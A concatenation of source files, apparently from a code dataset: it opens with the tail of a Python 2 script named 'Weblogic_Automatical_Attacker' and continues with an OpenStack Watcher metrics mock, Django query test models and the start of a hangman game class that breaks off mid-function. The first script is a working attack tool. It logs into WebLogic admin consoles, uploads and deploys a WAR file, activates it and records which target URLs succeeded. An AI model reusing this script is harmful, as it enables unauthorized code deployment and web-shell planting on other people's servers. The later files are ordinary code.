ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
login_data=requests.get(url+'/login/LoginForm.jsp',timeout=10)
cookie_buff=login_data.headers['Set-Cookie']
cookie_search=re.search(r'([A-za-z0-9]{5,}[!-]+[0-9]*)+',cookie_buff)
cookie=cookie_search.group()
self.cookies=dict(ADMINCONSOLESESSION=cookie,path='/')
print 'Cookie:%s'%cookie
return True
except:
print 'Get cookie Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('Get cookie Error! '+url+'\n')
f.close()
def do_login(self,url,usr,pwd,headers,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
data = {'j_username':usr,'j_password':pwd}
login_data=requests.post(url+'/j_security_check',data =data,headers=headers,cookies=self.cookies,timeout=10)
if login_data.content.count('console.portal') !=0:
print "\r\nLogin Successful!\r\n"
return True
else:
print "\r\nLogin Failed!\r\n"
f=open('bad.txt', 'a')
f.write('Login Failed: '+url+'\tWebLogic Server 10.x\n')
f.close()
return False
except:
print 'Login Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('Login Error! '+url+'\n')
f.close()
def get_server_name(self,url,headers,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
server_data=requests.get(url+'/console.portal?_nfpb=true&_pageLabel=CoreServerServerTablePage',headers=headers,cookies=self.cookies,timeout=10)
server_soup=BeautifulSoup(server_data.text)
for name in server_soup.find_all('a'):
if name.get('href') != None:
name=re.search(r'\:Name=[\w]*\,Type\=Server',urllib.unquote(name.get('href')))
if name :
self.server_name=name.group()
break
self.server_name=re.search(r'Name=[a-zA-Z0-9]*',self.server_name)
self.server_name=self.server_name.group()[5:]
print 'ServerName:%s\r\n' %self.server_name
return True
except:
print 'get_server_name Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('get_server_name Error! '+url+'\n')
f.close()
def get_domain_name(self,url,headers,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
domain_data=requests.get(url+'/console.portal?_nfpb=true&_pageLabel=CoreServerServerTablePage',headers=headers,cookies=self.cookies,timeout=10)
domain_soup=BeautifulSoup(domain_data.text)
for name in domain_soup.find_all('a'):
if name.get('href') != None:
name=re.search(r'\:Name=[\w]*\,Type\=Domain',urllib.unquote(name.get('href')))
if name :
self.domain_name=name.group()
break
self.domain_name=re.search(r'Name=[\w]*',self.domain_name)
self.domain_name=self.domain_name.group()[5:]
print 'DomainName:%s\r\n' %self.domain_name
return True
except:
print 'get_domain_name Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('get_domain_name Error! '+url+'\n')
f.close()
def get_path(self,url,headers,warname,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
path_exp=warname+' [^ -~]*[ -~]*'
path_sea=re.search(path_exp,self.path_data.text)
if path_sea:
path=re.search(r'[a-zA-Z]:(\\[\w .]+)+',path_sea.group()) #Windows
if path:
self.path=path.group()
self.system=1
print 'Target system: Windows\n'
else:
path=re.search(r'(/[\w .]+)+',path_sea.group()) #Linux
if path:
self.path=path.group()
self.system=2
print 'Target system: Linux\n'
time.sleep(1)
print 'Upload Path:%s\n' %self.path
return True
except:
print 'get_path Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('get_path Error! '+url+'\n')
f.close()
def uploader(self,url,warname,headers,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
upload_file = {'AppApplicationInstallPortletuploadAppPath': (warname, open(warname, 'rb'), 'application/octet-stream')}
upload_url=url+'/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/uploadApp'
print 'Uploading...',
self.path_data=requests.post(upload_url,cookies=self.cookies,headers=headers,files=upload_file,timeout=20)
print 'OK!\n'
return True
except:
print 'upload Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('upload Error! '+url+'\n')
f.close()
def unlock(self,url,headers,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
unlock_data={'ChangeManagerPortlet_actionOverride':'/MakeChangesAction',
'changeCenter':'ChangeCenterClicked',
'_nfpb':'true',
'_pageLabel':'HomeReserved'
}
requests.post(url+'/console.portal',data=unlock_data,headers=headers,cookies=self.cookies,timeout=10)
print 'Unlock OK!\n'
return True
except:
print 'Unlock Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('Unlock Error! '+url+'\n')
f.close()
def active(self,url,headers,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
active_data={'ChangeManagerPortlet_actionOverride':'/ActivateChangesAction',
'changeCenter':'ChangeCenterClicked',
'_nfpb':'true',
'_pageLabel':'HomeReserved'
}
requests.post(url+'/console.portal',data=active_data,headers=headers,cookies=self.cookies,timeout=10)
print 'Active OK!\n'
return True
except:
print 'Active Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('Active Error! '+url+'\n')
f.close()
def start_instance(self,url,headers,depolyname,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
start_data1={
'AppGlobalStartPortletchosenContents':'com.bea.console.handles.AppDeploymentHandle("com.bea:Name='+depolyname+',Type=AppDeployment")',
'_pageLabel':'AppGlobalStartPage',
'_nfpb':'true'
}
start_data2={'AppGlobalStartPortlet_actionOverride':'/com/bea/console/actions/app/globalstart/finish'}
print 'Starting instance...\n'
print 'Stage one....',
requests.post(url+'/console.portal?AppGlobalStartPortletreturnTo=AppDeploymentsControlPage&AppDeploymentsControlPortlethandle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3D'+self.domain_name+'%2CType%3DDomain%22%29',data=start_data1,headers=headers,cookies=self.cookies)
print 'OK!\tStage two....',
requests.post(url+'/console.portal',data=start_data2,headers=headers,cookies=self.cookies)
print 'OK!\n'
print '%s Started!\n' %depolyname
return True
except:
print 'Start Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('Start Error! '+url+'\n')
f.close()
def depoly(self,url,warname,depolyname,headers,count):
ctest=0
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
try:
if self.system == 1:
depoly_data1={'AppApplicationInstallPortletselectedAppPath': self.path+'\\'+warname}
depoly_data2={'AppApplicationInstallPortlettargetStyle': 'Application'}
depoly_data3={
'AppApplicationInstallPortletname': depolyname,
'AppApplicationInstallPortletsecurityModel': 'DDOnly',
'AppApplicationInstallPortletstagingStyle': 'Default',
'AppApplicationInstallPortletnoStageSourcePath': self.path+'\\'+warname
}
else:
depoly_data1={'AppApplicationInstallPortletselectedAppPath': self.path+'/'+warname}
depoly_data2={'AppApplicationInstallPortlettargetStyle': 'Application'}
depoly_data3={
'AppApplicationInstallPortletname': depolyname,
'AppApplicationInstallPortletsecurityModel': 'DDOnly',
'AppApplicationInstallPortletstagingStyle': 'Default',
'AppApplicationInstallPortletnoStageSourcePath': self.path+'/'+warname
}
print 'Depolying....',
requests.post(url+'/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/appSelected',cookies=self.cookies,headers=headers,data=depoly_data1,timeout=20)
requests.post(url+'/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/targetStyleSelected',cookies=self.cookies,headers=headers,data=depoly_data2,timeout=20)
requests.post(url+'/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/finish',cookies=self.cookies,headers=headers,data=depoly_data3,timeout=20)
print 'OK!\n'
return True
except:
print 'depoly Error!\n'
if ctest == 3:
f=open('error.txt', 'a')
f.write('depoly Error! '+url+'\n')
f.close()
def test(self,url,depolyname,testpage,count):
ctest=0
if len(self.domain_name) < 8:
t='\t\t\t'
elif len(self.domain_name) > 15:
t='\t'
else:
t='\t\t'
while True:
if ctest == count:
return False
else:
if ctest != 0:
ctest+=1
print "Retry %s times" %ctest
else:
ctest+=1
test_url=url.split('/console')[0]+'/'+depolyname+'/'+testpage
test_data=requests.get(test_url)
if len(test_url) < 40:
t2='\t\t'
else:
t2='\t'
if test_data.status_code == 200:
print 'Test OK!\t'+test_url+'\n'
f=open('good.txt', 'a')
if self.system == 1:
f.write(test_url+t2+'WebLogic 9\t\t'+self.domain_name+t+'Windows\t'+time.strftime("%Y-%m-%d[%H.%M.%S]")+'\n')
f.close()
return
else:
f.write(test_url+t2+'WebLogic 9\t\t'+self.domain_name+t+'Linux\t'+time.strftime("%Y-%m-%d[%H.%M.%S]")+'\n')
f.close()
return
else:
print 'Test Failed!'
f=open('bad.txt', 'a')
if self.system == 1:
f.write('Test Failed:'+test_url+t2+'WebLogic 9\t\t'+self.domain_name+t+'Windows\t'+time.strftime("%Y-%m-%d[%H.%M.%S]")+'\n')
f.close()
return
else:
f.write('Test Failed:'+test_url+t2+'WebLogic 9\t'+self.domain_name+t+'Linux\t'+time.strftime("%Y-%m-%d[%H.%M.%S]")+'\n')
f.close()
return
| dc3l1ne/Weblogic_Automatical_Attacker | ver9000.py | Python | gpl-2.0 | 11,387 |
# -*- encoding: utf-8 -*-
# Copyright (c) 2015 b<>com
#
# Authors: Jean-Emile DARTOIS <jean-emile.dartois@b-com.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import oslo_utils
class FakeCeilometerMetrics(object):
NAME = 'ceilometer'
def __init__(self):
self.emptytype = ""
def empty_one_metric(self, emptytype):
self.emptytype = emptytype
def mock_get_statistics(self, resource=None, resource_type=None,
meter_name=None, period=None, aggregate='mean',
granularity=None):
result = 0
if meter_name == 'host_cpu_usage':
result = self.get_usage_compute_node_cpu(resource)
elif meter_name == 'host_ram_usage':
result = self.get_usage_compute_node_ram(resource)
elif meter_name == 'host_outlet_temp':
result = self.get_average_outlet_temp(resource)
elif meter_name == 'host_inlet_temp':
result = self.get_average_inlet_temp(resource)
elif meter_name == 'host_airflow':
result = self.get_average_airflow(resource)
elif meter_name == 'host_power':
result = self.get_average_power(resource)
elif meter_name == 'instance_cpu_usage':
result = self.get_average_usage_instance_cpu(resource)
elif meter_name == 'instance_ram_usage':
result = self.get_average_usage_instance_memory(resource)
return result
def mock_get_statistics_nn(self, resource=None, meter_name=None,
period=None, aggregate='mean', granularity=300):
"""Statistics for noisy neighbor strategy
Signature should match DataSourceBase.get_instance_l3_cache_usage
"""
result = 0.0
if period == 100:
result = self.get_average_l3_cache_current(resource)
if period == 200:
result = self.get_average_l3_cache_previous(resource)
return result
def mock_get_statistics_wb(self, resource=None, resource_type=None,
meter_name=None, period=None, aggregate='mean',
granularity=None):
"""Statistics for workload balance strategy"""
result = 0.0
if meter_name == 'instance_cpu_usage':
result = self.get_average_usage_instance_cpu_wb(resource)
elif meter_name == 'instance_ram_usage':
result = self.get_average_usage_instance_memory_wb(resource)
return result
@staticmethod
def get_average_l3_cache_current(resource):
"""The average l3 cache used by instance"""
uuid = resource.uuid
mock = {}
mock['73b09e16-35b7-4922-804e-e8f5d9b740fc'] = 35 * oslo_utils.units.Ki
mock['cae81432-1631-4d4e-b29c-6f3acdcde906'] = 30 * oslo_utils.units.Ki
mock['INSTANCE_3'] = 40 * oslo_utils.units.Ki
mock['INSTANCE_4'] = 35 * oslo_utils.units.Ki
return mock[str(uuid)]
@staticmethod
def get_average_l3_cache_previous(resource):
"""The average l3 cache used by instance"""
uuid = resource.uuid
mock = {}
mock['73b09e16-35b7-4922-804e-e8f5d9b740fc'] = 34.5 * (
oslo_utils.units.Ki)
mock['cae81432-1631-4d4e-b29c-6f3acdcde906'] = 30.5 * (
oslo_utils.units.Ki)
mock['INSTANCE_3'] = 60 * oslo_utils.units.Ki
mock['INSTANCE_4'] = 22.5 * oslo_utils.units.Ki
return mock[str(uuid)]
@staticmethod
def get_average_outlet_temp(resource):
"""The average outlet temperature for host"""
uuid = resource.uuid
mock = {}
mock["fa69c544-906b-4a6a-a9c6-c1f7a8078c73"] = 30
# use a big value to make sure it exceeds threshold
mock["af69c544-906b-4a6a-a9c6-c1f7a8078c73"] = 100
if uuid not in mock.keys():
mock[uuid] = 100
return float(mock[str(uuid)])
@staticmethod
def get_usage_compute_node_ram(resource):
uuid = resource.uuid
mock = {}
# Ceilometer returns hardware.memory.used samples in KB.
mock['Node_0'] = 7 * oslo_utils.units.Ki
mock['Node_1'] = 5 * oslo_utils.units.Ki
mock['Node_2'] = 29 * oslo_utils.units.Ki
mock['Node_3'] = 8 * oslo_utils.units.Ki
mock['Node_4'] = 4 * oslo_utils.units.Ki
if uuid not in mock.keys():
# mock[uuid] = random.randint(1, 4)
mock[uuid] = 8
return float(mock[str(uuid)])
@staticmethod
def get_average_airflow(resource):
"""The average outlet temperature for host"""
uuid = resource.uuid
mock = {}
mock['Node_0'] = 400
# use a big value to make sure it exceeds threshold
mock['Node_1'] = 100
if uuid not in mock.keys():
mock[uuid] = 200
return mock[str(uuid)]
@staticmethod
def get_average_inlet_temp(resource):
"""The average outlet temperature for host"""
uuid = resource.uuid
mock = {}
mock['Node_0'] = 24
mock['Node_1'] = 26
if uuid not in mock.keys():
mock[uuid] = 28
return mock[str(uuid)]
@staticmethod
def get_average_power(resource):
"""The average outlet temperature for host"""
uuid = resource.uuid
mock = {}
mock['Node_0'] = 260
mock['Node_1'] = 240
if uuid not in mock.keys():
mock[uuid] = 200
return mock[str(uuid)]
@staticmethod
def get_usage_compute_node_cpu(*args, **kwargs):
"""The last VM CPU usage values to average
:param uuid:00
:return:
"""
resource = args[0]
uuid = "%s_%s" % (resource.uuid, resource.hostname)
measurements = {}
# node 0
measurements['Node_0_hostname_0'] = 7
measurements['Node_1_hostname_1'] = 7
measurements['fa69c544-906b-4a6a-a9c6-c1f7a8078c73_hostname_0'] = 7
measurements['af69c544-906b-4a6a-a9c6-c1f7a8078c73_hostname_1'] = 7
# node 1
measurements['Node_2_hostname_2'] = 80
# node 2
measurements['Node_3_hostname_3'] = 5
measurements['Node_4_hostname_4'] = 5
measurements['Node_5_hostname_5'] = 10
# node 3
measurements['Node_6_hostname_6'] = 8
# This node doesn't send metrics
measurements['LOST_NODE_hostname_7'] = None
measurements['Node_19_hostname_19'] = 10
# node 4
measurements['INSTANCE_7_hostname_7'] = 4
result = measurements[uuid]
return float(result) if result is not None else None
@staticmethod
def get_average_usage_instance_cpu_wb(resource):
"""The last VM CPU usage values to average
:param resource:
:return:
"""
uuid = resource.uuid
mock = {}
# node 0
mock['INSTANCE_1'] = 80
mock['73b09e16-35b7-4922-804e-e8f5d9b740fc'] = 50
# node 1
mock['INSTANCE_3'] = 20
mock['INSTANCE_4'] = 10
return float(mock[str(uuid)])
@staticmethod
def get_average_usage_instance_memory_wb(resource):
uuid = resource.uuid
mock = {}
# node 0
mock['INSTANCE_1'] = 30
mock['73b09e16-35b7-4922-804e-e8f5d9b740fc'] = 12
# node 1
mock['INSTANCE_3'] = 12
mock['INSTANCE_4'] = 12
return mock[str(uuid)]
@staticmethod
def get_average_usage_instance_cpu(*args, **kwargs):
"""The last VM CPU usage values to average
:param uuid:00
:return:
"""
resource = args[0]
uuid = resource.uuid
mock = {}
# node 0
mock['INSTANCE_0'] = 7
mock['INSTANCE_1'] = 7
# node 1
mock['INSTANCE_2'] = 10
# node 2
mock['INSTANCE_3'] = 5
mock['INSTANCE_4'] = 5
mock['INSTANCE_5'] = 10
# node 3
mock['INSTANCE_6'] = 8
# node 4
mock['INSTANCE_7'] = 4
mock['LOST_INSTANCE'] = None
# metrics might be missing in scenarios which do not do computations
if uuid not in mock.keys():
mock[uuid] = 0
return mock[str(uuid)]
@staticmethod
def get_average_usage_instance_memory(resource):
uuid = resource.uuid
mock = {}
# node 0
mock['INSTANCE_0'] = 2
mock['INSTANCE_1'] = 5
# node 1
mock['INSTANCE_2'] = 5
# node 2
mock['INSTANCE_3'] = 8
mock['INSTANCE_4'] = 5
mock['INSTANCE_5'] = 16
# node 3
mock['INSTANCE_6'] = 8
# node 4
mock['INSTANCE_7'] = 4
return mock[str(uuid)]
@staticmethod
def get_average_usage_instance_disk(resource):
uuid = resource.uuid
mock = {}
# node 0
mock['INSTANCE_0'] = 2
mock['INSTANCE_1'] = 2
# node 1
mock['INSTANCE_2'] = 2
# node 2
mock['INSTANCE_3'] = 10
mock['INSTANCE_4'] = 15
mock['INSTANCE_5'] = 20
# node 3
mock['INSTANCE_6'] = 8
# node 4
mock['INSTANCE_7'] = 4
return mock[str(uuid)]
| openstack/watcher | watcher/tests/decision_engine/model/ceilometer_metrics.py | Python | apache-2.0 | 9,723 |
"""
Various complex queries that have been problematic in the past.
"""
from __future__ import unicode_literals
import threading
from django.db import models
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
class DumbCategory(models.Model):
pass
class ProxyCategory(DumbCategory):
class Meta:
proxy = True
@python_2_unicode_compatible
class NamedCategory(DumbCategory):
name = models.CharField(max_length=10)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Tag(models.Model):
name = models.CharField(max_length=10)
parent = models.ForeignKey('self', blank=True, null=True,
related_name='children')
category = models.ForeignKey(NamedCategory, null=True, default=None)
class Meta:
ordering = ['name']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Note(models.Model):
note = models.CharField(max_length=100)
misc = models.CharField(max_length=10)
class Meta:
ordering = ['note']
def __str__(self):
return self.note
def __init__(self, *args, **kwargs):
super(Note, self).__init__(*args, **kwargs)
# Regression for #13227 -- having an attribute that
# is unpickleable doesn't stop you from cloning queries
# that use objects of that type as an argument.
self.lock = threading.Lock()
@python_2_unicode_compatible
class Annotation(models.Model):
name = models.CharField(max_length=10)
tag = models.ForeignKey(Tag)
notes = models.ManyToManyField(Note)
def __str__(self):
return self.name
@python_2_unicode_compatible
class ExtraInfo(models.Model):
info = models.CharField(max_length=100)
note = models.ForeignKey(Note)
value = models.IntegerField(null=True)
class Meta:
ordering = ['info']
def __str__(self):
return self.info
@python_2_unicode_compatible
class Author(models.Model):
name = models.CharField(max_length=10)
num = models.IntegerField(unique=True)
extra = models.ForeignKey(ExtraInfo)
class Meta:
ordering = ['name']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Item(models.Model):
name = models.CharField(max_length=10)
created = models.DateTimeField()
modified = models.DateTimeField(blank=True, null=True)
tags = models.ManyToManyField(Tag, blank=True)
creator = models.ForeignKey(Author)
note = models.ForeignKey(Note)
class Meta:
ordering = ['-note', 'name']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Report(models.Model):
name = models.CharField(max_length=10)
creator = models.ForeignKey(Author, to_field='num', null=True)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Ranking(models.Model):
rank = models.IntegerField()
author = models.ForeignKey(Author)
class Meta:
# A complex ordering specification. Should stress the system a bit.
ordering = ('author__extra__note', 'author__name', 'rank')
def __str__(self):
return '%d: %s' % (self.rank, self.author.name)
@python_2_unicode_compatible
class Cover(models.Model):
title = models.CharField(max_length=50)
item = models.ForeignKey(Item)
class Meta:
ordering = ['item']
def __str__(self):
return self.title
@python_2_unicode_compatible
class Number(models.Model):
num = models.IntegerField()
def __str__(self):
return six.text_type(self.num)
# Symmetrical m2m field with a normal field using the reverse accessor name
# ("valid").
class Valid(models.Model):
valid = models.CharField(max_length=10)
parent = models.ManyToManyField('self')
class Meta:
ordering = ['valid']
# Some funky cross-linked models for testing a couple of infinite recursion
# cases.
class X(models.Model):
y = models.ForeignKey('Y')
class Y(models.Model):
x1 = models.ForeignKey(X, related_name='y1')
# Some models with a cycle in the default ordering. This would be bad if we
# didn't catch the infinite loop.
class LoopX(models.Model):
y = models.ForeignKey('LoopY')
class Meta:
ordering = ['y']
class LoopY(models.Model):
x = models.ForeignKey(LoopX)
class Meta:
ordering = ['x']
class LoopZ(models.Model):
z = models.ForeignKey('self')
class Meta:
ordering = ['z']
# A model and custom default manager combination.
class CustomManager(models.Manager):
def get_queryset(self):
qs = super(CustomManager, self).get_queryset()
return qs.filter(public=True, tag__name='t1')
@python_2_unicode_compatible
class ManagedModel(models.Model):
data = models.CharField(max_length=10)
tag = models.ForeignKey(Tag)
public = models.BooleanField(default=True)
objects = CustomManager()
normal_manager = models.Manager()
def __str__(self):
return self.data
# An inter-related setup with multiple paths from Child to Detail.
class Detail(models.Model):
data = models.CharField(max_length=10)
class MemberManager(models.Manager):
def get_queryset(self):
return super(MemberManager, self).get_queryset().select_related("details")
class Member(models.Model):
name = models.CharField(max_length=10)
details = models.OneToOneField(Detail, primary_key=True)
objects = MemberManager()
class Child(models.Model):
person = models.OneToOneField(Member, primary_key=True)
parent = models.ForeignKey(Member, related_name="children")
# Custom primary keys interfered with ordering in the past.
class CustomPk(models.Model):
name = models.CharField(max_length=10, primary_key=True)
extra = models.CharField(max_length=10)
class Meta:
ordering = ['name', 'extra']
class Related(models.Model):
custom = models.ForeignKey(CustomPk)
class CustomPkTag(models.Model):
id = models.CharField(max_length=20, primary_key=True)
custom_pk = models.ManyToManyField(CustomPk)
tag = models.CharField(max_length=20)
# An inter-related setup with a model subclass that has a nullable
# path to another model, and a return path from that model.
@python_2_unicode_compatible
class Celebrity(models.Model):
name = models.CharField("Name", max_length=20)
greatest_fan = models.ForeignKey("Fan", null=True, unique=True)
def __str__(self):
return self.name
class TvChef(Celebrity):
pass
class Fan(models.Model):
fan_of = models.ForeignKey(Celebrity)
# Multiple foreign keys
@python_2_unicode_compatible
class LeafA(models.Model):
data = models.CharField(max_length=10)
def __str__(self):
return self.data
class LeafB(models.Model):
data = models.CharField(max_length=10)
class Join(models.Model):
a = models.ForeignKey(LeafA)
b = models.ForeignKey(LeafB)
@python_2_unicode_compatible
class ReservedName(models.Model):
name = models.CharField(max_length=20)
order = models.IntegerField()
def __str__(self):
return self.name
# A simpler shared-foreign-key setup that can expose some problems.
@python_2_unicode_compatible
class SharedConnection(models.Model):
data = models.CharField(max_length=10)
def __str__(self):
return self.data
class PointerA(models.Model):
connection = models.ForeignKey(SharedConnection)
class PointerB(models.Model):
connection = models.ForeignKey(SharedConnection)
# Multi-layer ordering
@python_2_unicode_compatible
class SingleObject(models.Model):
name = models.CharField(max_length=10)
class Meta:
ordering = ['name']
def __str__(self):
return self.name
class RelatedObject(models.Model):
single = models.ForeignKey(SingleObject, null=True)
f = models.IntegerField(null=True)
class Meta:
ordering = ['single']
@python_2_unicode_compatible
class Plaything(models.Model):
name = models.CharField(max_length=10)
others = models.ForeignKey(RelatedObject, null=True)
class Meta:
ordering = ['others']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Article(models.Model):
name = models.CharField(max_length=20)
created = models.DateTimeField()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Food(models.Model):
name = models.CharField(max_length=20, unique=True)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Eaten(models.Model):
food = models.ForeignKey(Food, to_field="name", null=True)
meal = models.CharField(max_length=20)
def __str__(self):
return "%s at %s" % (self.food, self.meal)
@python_2_unicode_compatible
class Node(models.Model):
num = models.IntegerField(unique=True)
parent = models.ForeignKey("self", to_field="num", null=True)
def __str__(self):
return "%s" % self.num
# Bug #12252
@python_2_unicode_compatible
class ObjectA(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
def __iter__(self):
# Ticket #23721
assert False, 'type checking should happen without calling model __iter__'
class ProxyObjectA(ObjectA):
class Meta:
proxy = True
class ChildObjectA(ObjectA):
pass
@python_2_unicode_compatible
class ObjectB(models.Model):
name = models.CharField(max_length=50)
objecta = models.ForeignKey(ObjectA)
num = models.PositiveSmallIntegerField()
def __str__(self):
return self.name
class ProxyObjectB(ObjectB):
class Meta:
proxy = True
@python_2_unicode_compatible
class ObjectC(models.Model):
name = models.CharField(max_length=50)
objecta = models.ForeignKey(ObjectA, null=True)
objectb = models.ForeignKey(ObjectB, null=True)
childobjecta = models.ForeignKey(ChildObjectA, null=True, related_name='ca_pk')
def __str__(self):
return self.name
@python_2_unicode_compatible
class SimpleCategory(models.Model):
name = models.CharField(max_length=15)
def __str__(self):
return self.name
@python_2_unicode_compatible
class SpecialCategory(SimpleCategory):
special_name = models.CharField(max_length=15)
def __str__(self):
return self.name + " " + self.special_name
@python_2_unicode_compatible
class CategoryItem(models.Model):
category = models.ForeignKey(SimpleCategory)
def __str__(self):
return "category item: " + str(self.category)
@python_2_unicode_compatible
class OneToOneCategory(models.Model):
new_name = models.CharField(max_length=15)
category = models.OneToOneField(SimpleCategory)
def __str__(self):
return "one2one " + self.new_name
class CategoryRelationship(models.Model):
first = models.ForeignKey(SimpleCategory, related_name='first_rel')
second = models.ForeignKey(SimpleCategory, related_name='second_rel')
class NullableName(models.Model):
name = models.CharField(max_length=20, null=True)
class Meta:
ordering = ['id']
class ModelD(models.Model):
name = models.TextField()
class ModelC(models.Model):
name = models.TextField()
class ModelB(models.Model):
name = models.TextField()
c = models.ForeignKey(ModelC)
class ModelA(models.Model):
name = models.TextField()
b = models.ForeignKey(ModelB, null=True)
d = models.ForeignKey(ModelD)
@python_2_unicode_compatible
class Job(models.Model):
name = models.CharField(max_length=20, unique=True)
def __str__(self):
return self.name
class JobResponsibilities(models.Model):
job = models.ForeignKey(Job, to_field='name')
responsibility = models.ForeignKey('Responsibility', to_field='description')
@python_2_unicode_compatible
class Responsibility(models.Model):
description = models.CharField(max_length=20, unique=True)
jobs = models.ManyToManyField(Job, through=JobResponsibilities,
related_name='responsibilities')
def __str__(self):
return self.description
# Models for disjunction join promotion low level testing.
class FK1(models.Model):
f1 = models.TextField()
f2 = models.TextField()
class FK2(models.Model):
f1 = models.TextField()
f2 = models.TextField()
class FK3(models.Model):
f1 = models.TextField()
f2 = models.TextField()
class BaseA(models.Model):
a = models.ForeignKey(FK1, null=True)
b = models.ForeignKey(FK2, null=True)
c = models.ForeignKey(FK3, null=True)
@python_2_unicode_compatible
class Identifier(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Program(models.Model):
identifier = models.OneToOneField(Identifier)
class Channel(models.Model):
programs = models.ManyToManyField(Program)
identifier = models.OneToOneField(Identifier)
class Book(models.Model):
title = models.TextField()
chapter = models.ForeignKey('Chapter')
class Chapter(models.Model):
title = models.TextField()
paragraph = models.ForeignKey('Paragraph')
class Paragraph(models.Model):
text = models.TextField()
page = models.ManyToManyField('Page')
class Page(models.Model):
text = models.TextField()
class MyObject(models.Model):
parent = models.ForeignKey('self', null=True, blank=True, related_name='children')
data = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
# Models for #17600 regressions
@python_2_unicode_compatible
class Order(models.Model):
id = models.IntegerField(primary_key=True)
class Meta:
ordering = ('pk', )
def __str__(self):
return '%s' % self.pk
@python_2_unicode_compatible
class OrderItem(models.Model):
order = models.ForeignKey(Order, related_name='items')
status = models.IntegerField()
class Meta:
ordering = ('pk', )
def __str__(self):
return '%s' % self.pk
class BaseUser(models.Model):
pass
@python_2_unicode_compatible
class Task(models.Model):
title = models.CharField(max_length=10)
owner = models.ForeignKey(BaseUser, related_name='owner')
creator = models.ForeignKey(BaseUser, related_name='creator')
def __str__(self):
return self.title
@python_2_unicode_compatible
class Staff(models.Model):
name = models.CharField(max_length=10)
def __str__(self):
return self.name
@python_2_unicode_compatible
class StaffUser(BaseUser):
staff = models.OneToOneField(Staff, related_name='user')
def __str__(self):
return self.staff
class Ticket21203Parent(models.Model):
parentid = models.AutoField(primary_key=True)
parent_bool = models.BooleanField(default=True)
created = models.DateTimeField(auto_now=True)
class Ticket21203Child(models.Model):
childid = models.AutoField(primary_key=True)
parent = models.ForeignKey(Ticket21203Parent)
class Person(models.Model):
name = models.CharField(max_length=128)
@python_2_unicode_compatible
class Company(models.Model):
name = models.CharField(max_length=128)
employees = models.ManyToManyField(Person, related_name='employers', through='Employment')
def __str__(self):
return self.name
class Employment(models.Model):
employer = models.ForeignKey(Company)
employee = models.ForeignKey(Person)
title = models.CharField(max_length=128)
# Bug #22429
class School(models.Model):
pass
class Student(models.Model):
school = models.ForeignKey(School)
class Classroom(models.Model):
school = models.ForeignKey(School)
students = models.ManyToManyField(Student, related_name='classroom')
| benjaminrigaud/django | tests/queries/models.py | Python | bsd-3-clause | 15,849 |
from Domain.Exceptions import UserDead, GameFinished
hangman = "hangman"
class GameState():
def __init__(self, sentence):
"""
Class used to keep state of a game.
This theoretically allows several games to be ongoing at the same time, without affecting each other.
"""
self.sentence = sentence
self.gameSentence = sentence.getGameSentence()
self.lives = 7
self.solved = False
def play(self, letter):
"""
Game logic. Used to play the game
Input: Letter - letter to be played with from the user
Output: State(Sentence, Lives, State) - Returned states described bellow
States: 0 - correct
-1 - user is dead
1 - incorrect
2 - ended
"""
if self.solved is True:
raise GameFinished("Game already solved!")
if self.lives is 0:
raise UserDead("Stop hanging the user!")
if letter in self.gameSentence['letters']:
for i in self.gameSentence['letters'][letter]:
self.gameSentence['solvable'][i] = letter
if '_' not in self.gameSentence['solvable']:
self.solved = True
return State(self.gameSentence['solvable'], self.lives, 2)
return State(self.gameSentence['solvable'], self.lives, 0)
else:
self.lives -= 1
if self.lives is 0:
